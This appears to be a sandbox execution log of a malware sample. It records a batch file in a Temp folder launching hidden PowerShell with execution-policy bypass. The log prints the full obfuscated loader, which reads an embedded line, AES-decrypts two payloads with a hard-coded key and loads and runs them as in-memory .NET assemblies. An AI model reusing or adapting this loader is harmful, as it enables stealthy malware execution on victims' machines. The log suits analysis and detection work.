cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "gGYcLv" C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat
2588powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr = 'C:\Users\test22\AppData\Local\Temp\Dtaqbmza.bat'; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO=[System.Security.Cryptography.Aes]::Create(); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.IV=[System.Convert]::FromBase64String('7AM2yoZ/54dcP3vKSzsqGA=='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Key=[System.Convert]::FromBase64String('QWVElovYpX3jzYwnlNT8Uf/i1KixgzGrFxLrNjNQkUY='); $PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.Mode=[System.Security.Cryptography.CipherMode]::CBC;function decrypt_function($param_var){ $tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY=$PvdIqjptkwzRWjPApNtECTNUfvNJCZDVulwVksGO.CreateDecryptor(); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW=$tLtYuglriQrHRuaVIjCUvFQkSExLNTpXhEkQzPzY.TransformFinalBlock($param_var, 0, $param_var.Length); $kwBLIWdZkAnbPLsOUifQJAEpBtAmkjvSJDKZefCW;}function execute_function($param_var,$param2_var){ $UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH=[System.Reflection.Assembly]::Load([byte[]]$param_var); $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi=$UrBOqNGxlRQhCPuWAZwTvDzVkryTmjAebiEZIMYH.EntryPoint; $cKWcvbfZZlsJXzXrSGDZoMlbrMgulvnNaORKGxAi.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = $kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr;$eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug = [type]::GetType('Syst'+'e'+'m'+'.I'+'O.F'+'i'+'l'+'e');$OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD = [type]::GetType('S'+'ys'+'t'+'e'+'m'+'.E'+'nv'+'i'+'ro'+'n'+'me'+'n'+'t');$myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA = $eIGbxVhLRvHrvQziUVefWfBmlmESLUyXmRvFkMug::ReadAllText($kdot_tzwRsZUJVbQSvaAdQzSTmKovkQyvFKghyTtlfWyr);$FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN = $OpKrnIxiOdDoHSGZgtPlroaWXJfEuUYiAXqHvkZD::NewLine;$ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD = $myUaQQgClnhcjZtqzUKJVKOEYEJjImKufuMPRkkA.Split($FEjXnkEavAlLMQmBKpcmhXTZCMWOmDypKkdrBQqN);$mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd = $ZINhbYHoilfChYtHKkvAnQNScVbCNVZTYomyjMXD;foreach ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe in $mWcxKgzgwUMPNqYIkaHBAyekUJtBGoXTbAGqIRLd) { if ($pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.StartsWith(':: ')) { $rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD=$pmGVnSEeJSyQoLrtSROfDgynLHRLMHoyGZKArEUe.Substring(3); break; }}$payloads_var=[string[]]$rsZKYruhVLafpWQNRSCaMXzhWSNnJIatoDkiztmD.Split('\');$payload1_var= decrypt_function ([Convert]::FromBase64String($payloads_var[0]));$payload2_var= decrypt_function ([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2748